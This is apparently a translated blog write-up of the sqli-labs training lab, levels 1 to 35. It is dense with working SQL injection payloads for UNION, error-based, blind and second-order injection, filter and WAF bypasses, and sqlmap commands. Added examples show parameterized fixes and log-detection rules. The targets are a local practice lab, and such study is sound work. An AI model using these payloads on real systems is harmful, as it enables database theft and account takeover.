Sqli-labs Less (1-35) summary

Source: Internet
Author: User
Tags base64

First, the tools:

phpstudy2016: Link: http://pan.baidu.com/s/1bpbEBCj Password: FMR4

Sqli-labs-master: Link: http://pan.baidu.com/s/1jH4WlMY Password: 11MJ

The environment setup was written up earlier, so there is not much to say; let's go straight into the levels.

All the experiments take the current database as the example, that is ...

Level 1 explains the initial determination of the injection point and how the input is closed; the later levels do not repeat this ...

1, http://127.0.0.1/sqli-labs-master/Less-1/?id=1

Method 1: manual UNION query injection

Enter a single quotation mark; the result is as shown:

From the error message you can tell that the input parameter sits inside a pair of single quotes. Mentally reconstructed, our input 1 lands in the database query as: select ... where id='1' .... Skipping the intermediate steps, go straight to dumping data.

Dump tables

http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

Dump columns

http://127.0.0.1/sqli-labs-master/Less-1/?id=0%27%20union%20select%201,group_concat%28column_name%29,3%20from%20information_schema.columns%20where%20table_name=%27users%27%20--+

Dump values

http://127.0.0.1/sqli-labs-master/Less-1/?id=0%27%20union%20select%201,group_concat%28username,0x3a,password%29,3%20from%20users%20--+
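The reason the Level-1 payloads work is the query shape the error message reveals: select ... where id='<input>', built by splicing the parameter into the SQL text. The following is an added example (not code from the original post or from sqli-labs) that reproduces that shape on an in-memory SQLite database and puts the parameterized form next to it. The schema, rows, function names and the SQLite-flavoured payload are constructed for this demo; it uses || for concatenation and two result columns because that is what the demo query returns.

```python
"""
Added example: the Less-1 query shape, select ... where id='<input>',
built by string splicing, beside the parameterized form that fixes it.
Everything here (table, rows, function names) is constructed for the demo.
"""
import sqlite3


def make_db():
    # Constructed sample table standing in for the lab's security.users.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'Dumb', 'Dumb');
        INSERT INTO users VALUES (2, 'Angelina', 'I-kill-you');
    """)
    return conn


def lookup_vulnerable(conn, raw_id):
    # The quote pair the error message reveals: the input lands inside '...',
    # so anything after a closing quote is parsed as SQL.
    sql = f"SELECT username, password FROM users WHERE id='{raw_id}' LIMIT 0,1"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, raw_id):
    # The driver sends the value separately from the statement text, so a
    # quote or UNION in the input is just characters compared against id.
    sql = "SELECT username, password FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (raw_id,)).fetchall()


# The post's "dump values" payload rewritten for SQLite's || concatenation
# and two result columns; the trailing -- comments out the rest of the query.
UNION_PAYLOAD = "0' UNION SELECT 1, group_concat(username || ':' || password) FROM users -- "


if __name__ == "__main__":
    db = make_db()
    print("normal id, vulnerable:   ", lookup_vulnerable(db, "1"))
    print("payload, vulnerable:     ", lookup_vulnerable(db, UNION_PAYLOAD))
    print("payload, parameterized:  ", lookup_parameterized(db, UNION_PAYLOAD))
```

The vulnerable lookup returns the whole users table in one row for the crafted id, while the parameterized lookup compares the same string against the integer id column and returns nothing; the column-count and quote-closing guesswork the post walks through is exactly what the bound parameter takes away.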

Method 2: manual error-based injection

Dump tables

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20and%201=extractvalue%281,concat%280x7e,%28select%20group_concat%28table_name%29%20from%20information_schema.tables%20where%20table_schema=database%28%29%29%29%29%20--+

Dump columns

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20and%201=extractvalue%281,concat%280x7e,%28select%20group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_name=%27users%27%29%29%29%20--+

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20and%201=extractvalue%281,concat%280x7e,%28select%20group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_name=%27users%27 and column_name not in ('user_id','first_name','last_name','us')%29%29%29%20--+

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20and%201=extractvalue%281,concat%280x7e,%28select%20group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_name=%27users%27%20and%20column_name%20not%20in%20%28%27user_id%27,%27first_name%27,%27last_name%27,%27us%27,%27user%27,%27password%27,%27avatar%27,%27last_login%27%29%29%29%29%20--+

Dump values

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20and%201=extractvalue%281,concat%280x7e,%28select%20group_concat%28username,0x3a,password%29%20from%20users%29%29%29--+

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20and%201=extractvalue%281,concat%280x7e,%28select%20group_concat%28username,0x3a,password%29%20from%20users%20where%20username%20not%20in%20%28%27dumb%27,%27i-kill-you%27%29%29%29%29--+

The steps are similar, so they are not repeated.

Method 3: injection with the sqlmap tool

The -v 0 parameter is used with the tool just for better ...

sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=1 --technique UE --dbms mysql --batch -v 0

sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=1 --technique UE --dbms mysql --dbs --batch -v 0

sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=1 --technique UE --dbms mysql -D security --tables --batch -v 0

sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=1 --technique UE --dbms mysql -D security -T users --columns --batch -v 0

sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=1 --technique UE --dbms mysql -D security -T users -C username,password --dump --batch -v 0

Other databases, tables and fields are not dumped here...

2, http://127.0.0.1/sqli-labs-master/Less-2/?id=1

Enter a single quotation mark; from the error message you can tell that what we entered goes into the database unquoted, which can also be called numeric injection. Just remove the single quote after id=1 in the Level-1 payloads and leave everything else unchanged; not repeated ...

3, http://127.0.0.1/sqli-labs-master/Less-3/?id=1

Enter a single quotation mark; from the error message you can tell that what we entered is wrapped in a pair of single quotes plus parentheses. Mentally reconstruct where our 1 lands in the database statement, like select ... from ... where id=('1') .... Add a ) after the single quote in the Level-1 payload id=1' and leave everything else the same; not repeated ...

4, http://127.0.0.1/sqli-labs-master/Less-4/?id=1

Enter a single quotation mark: no change on the page. Try a double quotation mark: the page errors. From the error message you can tell that what we entered is wrapped in a pair of double quotes plus parentheses; reconstructed: select ... from ... where id=("1") .... Change the quote after 1 in the Level-1 payload to a double quote plus ).

5, http://127.0.0.1/sqli-labs-master/Less-5/?id=1

Seeing this error message, the first reaction is Boolean blind, error-based and time-based blind injection; nine times out of ten a UNION query injection cannot be used ...

A simple test confirms all of those guesses. The following verifies the time-based blind injection:

http://127.0.0.1/sqli-labs-master/Less-5/?id=1%27%20and%20sleep%285%29--+

Error-based injection: the method is the same as Level 1, all closed with single quotes.

Boolean and time-based blind injection are best run with sqlmap ...

6, http://127.0.0.1/sqli-labs-master/Less-6/?id=1

Replace the single quotation mark of the previous level with a double quotation mark.

7, http://127.0.0.1/sqli-labs-master/Less-7/?id=1

After several attempts it is not hard to guess that the comment is filtered ...; enter directly: http://127.0.0.1/sqli-labs-master/Less-7/?id=1%27%20and%20%271%27=%271

From the error message it is clear that error-based injection is basically out; go straight to Boolean blind or time-based blind, run with sqlmap:

sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-7/?id=1 --technique B --dbms mysql --batch -v 0

8, http://127.0.0.1/sqli-labs-master/Less-8/?id=1

The input is placed in a pair of single quotes, and the comment is usable, so construct the payloads:

http://127.0.0.1/sqli-labs-master/Less-8/?id=1%27%20and%201=1%20--+

http://127.0.0.1/sqli-labs-master/Less-8/?id=1%27%20and%202=1%20--+

Judging that Boolean blind injection exists, run with sqlmap, the same as Level 7 ...

sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-8/?id=1 --technique B --dbms mysql --batch -v 0

9, http://127.0.0.1/sqli-labs-master/Less-9/?id=1

The parameter content is placed in a pair of single quotes, no guessing needed ... comment characters are usable.

Simple check: http://127.0.0.1/sqli-labs-master/Less-9/?id=1%27%20and%20sleep(5)%20--+

The page response is delayed, confirming that time-based injection exists; run directly with sqlmap:

sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-9/?id=1 --technique T --dbms mysql --batch -v 0

10, http://127.0.0.1/sqli-labs-master/Less-10/?id=1

The input parameter content, 1, is placed in a pair of double quotes, and the comment is usable.

http://127.0.0.1/sqli-labs-master/Less-10/?id=1%22%20and%20sleep(5)--+

The page response is delayed: time-based injection; run directly with sqlmap.

Here the prefix needs to be modified: edit the contents of boundaries.xml under the xml folder as shown.

Run directly with sqlmap.

11, http://127.0.0.1/sqli-labs-master/Less-11/

Levels 11 to 21 are all POST-type, so a packet-capture tool is needed; I used Burp Suite.

Capture the request with Burp Suite; a simple test shows error-based injection exists:

uname=admin' and extractvalue(1,concat(0x7e,(select database())))--+&passwd=admin&submit=submit

Run sqlmap directly.

Also, UNION query injection exists, as shown.

Run sqlmap directly.

12, http://127.0.0.1/sqli-labs-master/Less-12/

Double quotes, error-based.

Run sqlmap directly:

sqlmap.py -r C:\Users\esafenet\AppData\Local\Temp\1506657847007.req --technique E --dbms mysql --batch -v 0

13, http://127.0.0.1/sqli-labs-master/Less-13/

Testing the injection type on the captured request: the input parameter is placed inside ('), and the comment is usable, as shown.

Run directly with sqlmap:

sqlmap.py -r C:\Users\esafenet\AppData\Local\Temp\1506661582400.req --prefix "')" --technique E --dbms mysql --batch -v 0

14, http://127.0.0.1/sqli-labs-master/Less-14/

The input is placed in double quotes, error-based injection, the comment is not usable, as shown.

Run with sqlmap:

sqlmap.py -r C:\Users\esafenet\AppData\Local\Temp\1506662249280.req --technique E --dbms mysql --batch -v 0

15, http://127.0.0.1/sqli-labs-master/Less-15/

Judging by the page output, the blind injection can be tested as Boolean and time-based, as shown:

uname=admin' and 1=1--+&passwd=admin&submit=submit

uname=admin' and 1=2--+&passwd=admin&submit=submit

uname=admin' and sleep(5)--+&passwd=admin&submit=submit

The page response is delayed, so time-based injection exists.

Run directly with sqlmap:

sqlmap.py -r C:\Users\esafenet\AppData\Local\Temp\1506662373346.req --technique T --dbms mysql --batch -v 0 --threads 8

The Boolean blind had a small problem: sqlmap did not manage to extract anything with it, so it can only be dumped by hand, which is a pain.

16, http://127.0.0.1/sqli-labs-master/Less-16/

sqlmap.py -r C:\Users\esafenet\AppData\Local\Temp\1506664390744.req -p "uname" --technique T --dbms mysql --batch --level 3 --threads 8 -v 0

17, http://127.0.0.1/sqli-labs-master/Less-17/

Error-based injection, single quotes, comment symbol usable.

Test with sqlmap:

sqlmap.py -r C:\Users\esafenet\AppData\Local\Temp\1506754249224.req -p passwd --tech E --dbms mysql --batch -v 0

18, http://127.0.0.1/sqli-labs-master/Less-18/

Error-based, single quotes, the injection point is in the User-Agent.

Run directly with sqlmap, adding an * after the User-Agent content in the HTTP request header:

sqlmap.py -r C:\Users\esafenet\AppData\Local\Temp\1506757146400.req --user-agent "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" --tech E --dbms mysql --batch -v 0

19, http://127.0.0.1/sqli-labs-master/Less-19/

Error-based, single quotes, the injection point is in the Referer.

Run directly with sqlmap, adding an * after the Referer content in the HTTP request header:

sqlmap.py -r C:\Users\esafenet\AppData\Local\Temp\1506757627681.req --referer http://127.0.0.1/sqli-labs-master/Less-19/ --tech E --dbms mysql --batch -v 0

20, http://127.0.0.1/sqli-labs-master/Less-20/

Error-based, single quotes, the injection point is in the cookie.

Test directly with sqlmap:

sqlmap.py -r C:\Users\esafenet\AppData\Local\Temp\1506758959558.req --cookie uname=admin --tech E --dbms mysql --batch -v 0

21, http://127.0.0.1/sqli-labs-master/Less-21/

This is similar to Level 20, except the uname value in the cookie is Base64 encoded; with sqlmap just use a tamper script, straight on to sqlmap:

sqlmap.py -r C:\Users\esafenet\AppData\Local\Temp\1506759460951.req --cookie uname=YWRtaW4%3d --tech E --dbms mysql --tamper base64encode.py --batch -v 0

22, http://127.0.0.1/sqli-labs-master/Less-22/

Error-based, double quotes, Base64 encoded; without changing the payload level, the --level 3 parameter is needed.

Straight on to sqlmap:

sqlmap.py -r C:\Users\esafenet\AppData\Local\Temp\1506760318956.req --cookie uname=YWRtaW4= --tech E --dbms mysql --tamper base64encode.py --batch -v 0

23, http://127.0.0.1/sqli-labs-master/Less-23/

Single quotes, the comment is filtered; just throw sqlmap at it.

24, http://127.0.0.1/sqli-labs-master/Less-24/?id=1

Register a user name that carries the administrator account name; then, when that user changes its password, the administrator account's password gets changed as well.

Registered user name: admin' or '1'='1, password: admin

After registering successfully, log in and change the password to 123.

Looking at the change, the admin user's password has also become 123.

Mentally reconstructed: update [table] set password='123' where username='admin' or '1'='1'
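What Level 24 demonstrates is a second-order injection: registration stores the crafted user name safely, but the password-change step later reads that stored name back and splices it into an UPDATE as if it were trusted. The following is an added example (not code from the original post or from sqli-labs) that reproduces the reconstructed UPDATE on an in-memory SQLite database next to the parameterized form. Schema, rows and function names are constructed for this demo; the lab's real UPDATE also checks the current password, which is left out here to match the post's reconstruction.

```python
"""
Added example: the second-order shape reconstructed for Less-24.
Registration binds its values, the later password change does not.
Schema, rows and function names are constructed for this demo.
"""
import sqlite3


def make_db():
    # Constructed accounts; the attacker-controlled one is added by register().
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'admin');
        INSERT INTO users VALUES ('Dumb', 'Dumb');
    """)
    return conn


def register(conn, username, password):
    # Registration binds its values, so the crafted name is stored literally:
    # escaping at input time does not help once the value is read back later.
    conn.execute("INSERT INTO users VALUES (?, ?)", (username, password))


def change_password_vulnerable(conn, session_username, new_password):
    # The name comes back out of the database (via the session) and is treated
    # as already clean; spliced into SQL it closes the quote and appends or '1'='1.
    sql = (f"UPDATE users SET password='{new_password}' "
           f"WHERE username='{session_username}'")
    conn.execute(sql)


def change_password_parameterized(conn, session_username, new_password):
    # Bound parameters keep the stored name a plain value, however it is spelled.
    conn.execute("UPDATE users SET password=? WHERE username=?",
                 (new_password, session_username))


def password_of(conn, username):
    row = conn.execute("SELECT password FROM users WHERE username=?",
                       (username,)).fetchone()
    return row[0] if row else None


CRAFTED_NAME = "admin' or '1'='1"   # the user name registered in the post


def demo(change_password):
    # Register the crafted name, "log in" as it, change its password to 123,
    # then report which accounts ended up with the new password.
    db = make_db()
    register(db, CRAFTED_NAME, "admin")
    change_password(db, CRAFTED_NAME, "123")
    return {u: password_of(db, u) for u in ("admin", "Dumb", CRAFTED_NAME)}


if __name__ == "__main__":
    print("vulnerable:    ", demo(change_password_vulnerable))
    print("parameterized: ", demo(change_password_parameterized))
```

With the spliced UPDATE every account, not only admin, ends up with password 123, because the WHERE clause has become username='admin' or '1'='1'; with the bound version only the crafted account changes. The fix is the same as for the first-order levels: data read back from the database is still data, and must be bound rather than concatenated.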

25, http://127.0.0.1/sqli-labs-master/Less-25/?id=1

Filters and and or. Bypass methods: replace and with %26%26, or double-write it as anandd; replace or with || or oorr. Without further ado, here I directly wrote a tamper script and ran it with sqlmap.

The contents of the and2anandd.py script are as follows:

sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-25/?id=1 -p id --tech E --dbms mysql --tamper and2anandd.py --batch -v 0

26, http://127.0.0.1/sqli-labs-master/Less-26/?id=1

This level filters all whitespace characters, and for now I have not found a character to replace the space; the experts are welcome to share ^_^

27, http://127.0.0.1/sqli-labs-master/Less-27/?id=1

union, select, spaces and comment characters are filtered. Modify the tamper script and test together with sqlmap: use %09, %0a and so on instead of spaces, and double writing instead of select; the script is similar to Level 25. Test directly with sqlmap:

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-27/?id=1 -p id --prefix "'" --suffix "%0aand%0a'1'='1" --tech E --dbms mysql --tamper select2selecselectt.py,space2%0a.py --batch -v 0

28, http://127.0.0.1/sqli-labs-master/Less-28/?id=1

http://127.0.0.1/sqli-labs-master/Less-28/?id=0%27)%0aunionunion%0aselect%0aselect%0a1,2,3%0aand%0a(%271%27=%271

Run directly with sqlmap. This level filters union + space + select as well as spaces, but what sqlmap uses is union + all + select, so we just need other whitespace characters in place of the space:

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-28/?id=1 --prefix "')" --suffix "%0aand%0a('1'='1" --tech U --dbms mysql --tamper space2%0a.py --batch -v 0

Testing found there is no error-based injection.
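From the defending side, the request shapes used from Level 1 up to here are easy to pick out of a web-server access log once the query string is percent-decoded, and decoding also collapses the %0a / %09 substitutions of Levels 27 and 28 back into ordinary whitespace. The following is an added example, not code from the original post, of a small log scanner for those shapes (UNION SELECT, extractvalue() extraction, sleep() delays, information_schema enumeration, quote-closing tautologies, "--+" terminators, and sqlmap's default User-Agent). The log lines are constructed for the demo from the URLs in this post; the rule names, function names and the sample User-Agent strings are the example's own.

```python
"""
Added example: detection rules for the injection shapes in this write-up,
run over constructed Apache combined-format access-log lines.
"""
import re
from urllib.parse import unquote_plus

# Constructed log lines: one benign request, then the request shapes from
# Levels 1, 5, 7 and 28 of this post, then a plain request with sqlmap's
# default User-Agent (version string constructed for the demo).
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Oct/2017:10:00:00 +0800] "GET /sqli-labs-master/Less-1/?id=1 HTTP/1.1" 200 721 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [01/Oct/2017:10:00:01 +0800] "GET /sqli-labs-master/Less-1/?id=0%27%20union%20select%201,group_concat%28username,0x3a,password%29,3%20from%20users%20--+ HTTP/1.1" 200 845 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [01/Oct/2017:10:00:02 +0800] "GET /sqli-labs-master/Less-1/?id=1%27%20and%201=extractvalue%281,concat%280x7e,%28select%20group_concat%28table_name%29%20from%20information_schema.tables%20where%20table_schema=database%28%29%29%29%29%20--+ HTTP/1.1" 200 790 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [01/Oct/2017:10:00:03 +0800] "GET /sqli-labs-master/Less-5/?id=1%27%20and%20sleep%285%29--+ HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [01/Oct/2017:10:00:04 +0800] "GET /sqli-labs-master/Less-7/?id=1%27%20and%20%271%27=%271 HTTP/1.1" 200 655 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [01/Oct/2017:10:00:05 +0800] "GET /sqli-labs-master/Less-28/?id=0%27)%0aunionunion%0aselect%0aselect%0a1,2,3%0aand%0a(%271%27=%271 HTTP/1.1" 200 702 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [01/Oct/2017:10:00:06 +0800] "GET /sqli-labs-master/Less-1/?id=1 HTTP/1.1" 200 721 "-" "sqlmap/1.1.9#stable (http://sqlmap.org)"',
]

# Apache combined request line: method, path, protocol, status, size, referer, user-agent.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')

# Rules run on the percent-decoded, lower-cased query string, so the %0a/%09
# whitespace substitutions from Less-27/28 still land on \s+.
RULES = [
    ("union-select", re.compile(r"union\s+(all\s+)?select")),
    ("error-function", re.compile(r"\bextractvalue\s*\(")),
    ("time-delay", re.compile(r"\bsleep\s*\(")),
    ("schema-enumeration", re.compile(r"information_schema")),
    ("tautology", re.compile(r"\b(or|and)\b\s*\(?\s*'?\d+'?\s*=\s*'?\d+")),
    ("comment-terminator", re.compile(r"--(\s|$)")),
]


def decode_query(path):
    # Keep only the query string; unquote_plus turns the "+" of "--+" into a space.
    _, _, query = path.partition("?")
    return unquote_plus(query).lower()


def scan_line(line):
    # Returns the names of the rules a single log line trips, in rule order.
    m = LOG_RE.search(line)
    if not m:
        return []
    query = decode_query(m.group("path"))
    hits = [name for name, rx in RULES if rx.search(query)]
    if m.group("ua").lower().startswith("sqlmap/"):
        hits.append("sqlmap-user-agent")
    return hits


def scan_log(lines):
    # (1-based line number, hits) for every line that trips at least one rule.
    return [(i, hits) for i, line in enumerate(lines, 1) if (hits := scan_line(line))]


if __name__ == "__main__":
    for lineno, hits in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(hits)}")
```

Decoding before matching is the important step: the raw Less-28 line never contains the string "union select", but after %0a becomes a newline the same rule that catches Level 1 catches it too. The User-Agent rule only covers a tool run with its default header; the post's Level 18 command overrides it, which is why the query-string rules, not the header, carry the detection.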

29, http://127.0.0.1/sqli-labs-master/Less-29/?id=1

Can be dumped directly; the WAF is just for show.

http://127.0.0.1/sqli-labs-master/Less-29/?id=0%27%20union%0aall%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()%20--+

Test directly with sqlmap:

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-29/?id=1 --dbms mysql --batch -v 0

30, http://127.0.0.1/sqli-labs-master/Less-30/?id=1

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-30/?id=1 --dbms mysql --batch -v 0

31, http://127.0.0.1/sqli-labs-master/Less-31/?id=1

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-31/?id=1 --dbms mysql --batch -v 0

32, http://127.0.0.1/sqli-labs-master/Less-32/?id=1

http://127.0.0.1/sqli-labs-master/Less-32/?id=0%df%27%20union%20all%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+

33, http://127.0.0.1/sqli-labs-master/Less-33/

http://127.0.0.1/sqli-labs-master/Less-33/?id=0%df%27%20union%20all%20select%201,2,3--+

http://127.0.0.1/sqli-labs-master/Less-33/?id=0%df%27%20union%20all%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+

34, http://127.0.0.1/sqli-labs-master/Less-34/

Capture the request with Burp Suite and test manually.

35, http://127.0.0.1/sqli-labs-master/Less-35

http://127.0.0.1/sqli-labs-master/Less-35/?id=0%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()

To be continued...
